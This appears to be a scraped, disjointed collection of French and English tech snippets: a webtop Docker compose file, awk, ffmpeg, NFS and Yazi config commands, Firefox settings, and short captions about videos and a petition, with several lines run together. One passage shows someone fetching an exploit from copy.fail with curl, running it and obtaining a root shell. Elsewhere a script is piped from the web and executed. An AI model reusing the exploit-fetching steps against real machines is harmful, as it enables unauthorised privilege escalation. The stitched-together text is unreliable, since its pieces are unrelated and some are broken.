services:
webtop:
container_name: webtop
image: lscr.io/linuxserver/webtop:arch-xfce
environment:
- PUID=1000
- PGID=1000
- TZ=Europe/Paris # ← change to your timezone
- LC_ALL=fr_FR.UTF-8
- DOCKER_MODS=linuxserver/mods:universal-package-install
- INSTALL_PACKAGES=git|tree|vim
ports:
- 3000:3000
volumes:
- ./webtop-config:/config # persistent home directory + settings
- ./tmp:/tmp
shm_size: 1gb # very important for performance!autotrace -output-format svg inputfile | tee inputfile.svg
Le plus grand immeuble imprimé en 30 jours.
Et la performance époustouflante du Ford SuperVan 4.2 qui finit devant la F1.
envoyer, avec un minimum d'effort, un fichier ou un bout de texte d'une machine à une autre sur le même réseau local. Ça marche sous Linux, Windows et Android.
Can you upload it to APKMirror using ML Manager and share the APK splits using SAI?
Un DJ en mode homme-orchestre dans les rues de NYC.
Un mélange délicieux!
UNE PÉTITION À SIGNER EN URGENCE.
À partir de septembre 2026, une mise à jour silencieuse, imposée sans consentement par Google, bloquera toutes les applications Android dont le développeur ne s'est pas enregistré auprès de Google, n'a pas signé son contrat, n'a pas payé et n'a pas fourni de pièce d'identité officielle.
awk '{sub(/are hello/,"are are")sub(/you hello/,"you you")}1' file
/foo/bar/how /SOME_TEXT_HERE/hello
/foo/bar/are are/SOME_OTHER_TEXT
/foo/bar/you you
file 'photo1.jpg'
file 'photo2.jpg'
file 'photo3.jpg'ffmpeg -f concat -safe 0 -r 1 -i input.txt -c:v libx264 -r 30 -pix_fmt yuv420p output.mp4diskutil unmount /Volumes/stuff; mount -o nfsvers=4 -t nfs 192.168.1.82:/volume1/stuff /Volumes/stuffsudo mount -o nfsvers=3,rw,sync -t nfs 192.168.1.82:/volume1/stuff /Volumes/stuffbrew install media-info # install mediainfo cli via Homebrew
ya pkg add boydaihungst/mediainfo # install mediainfo plugin for Yazi
# add mediainfo parameters in config
cat<<EOF>>~/.config/yazi/yazi.toml
[plugin]
prepend_preloaders = [
# Replace magick, image, video with mediainfo
{ mime = "{audio,video,image}/*", run = "mediainfo" },
{ mime = "application/subrip", run = "mediainfo" },
# Adobe Illustrator, Adobe Photoshop is image/adobe.photoshop, already handled above
{ mime = "application/postscript", run = "mediainfo" },
]
prepend_previewers = [
# Replace magick, image, video with mediainfo
{ mime = "{audio,video,image}/*", run = "mediainfo"},
{ mime = "application/subrip", run = "mediainfo" },
# Adobe Illustrator, Adobe Photoshop is image/adobe.photoshop, already handled above
{ mime = "application/postscript", run = "mediainfo" },
]
EOF
C'est just magnifique!
git show 6fd6475:playbook.yml
allow_world_readable_tmpfiles: true in your vars.yml file
toto@s55486:~$ curl https://copy.fail/exp > copyfail
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 731 0 731 0 0 3458 0 --:--:-- --:--:-- --:--:-- 3448
toto@s55486:~$ more copyfail
#!/usr/bin/env python3
…
On l'examine mais, de toute façon, il est peu compréhensible. On le fait tourner (et je me répète, ne faites pas ça sur une machine de production !!!) :
toto@s55486:~$ python3 copyfail
# id
uid=0(root) gid=1000(toto) groups=1000(toto),100(users)
toto@s55486:~$ su
#
Et voilà, on est root.
curl -L https://codeberg.org/cryinkfly/Autodesk-Fusion-360-on-Linux/raw/branch/main/files/setup/autodesk_fusion_installer_x86-64.sh -o "autodesk_fusion_installer_x86-64.sh" && chmod +x autodesk_fusion_installer_x86-64.sh && ./autodesk_fusion_installer_x86-64.sh --install --default
ssh-copy-id -o PreferredAuthentications=password -o PubkeyAuthentication=no -i ~/.ssh/rsa_private_key <server> for copying ssh pubkey to remote server after password authentication
media.autoplaymedia.autoplay.blocking_policy to 1media.autoplay.default to 5Bonus: How to set default volume level: media.volume.scale set to .25 (or other sub 1 number)
settings > wifi > known networks > <your_ssid> > ... > network settings > low data mode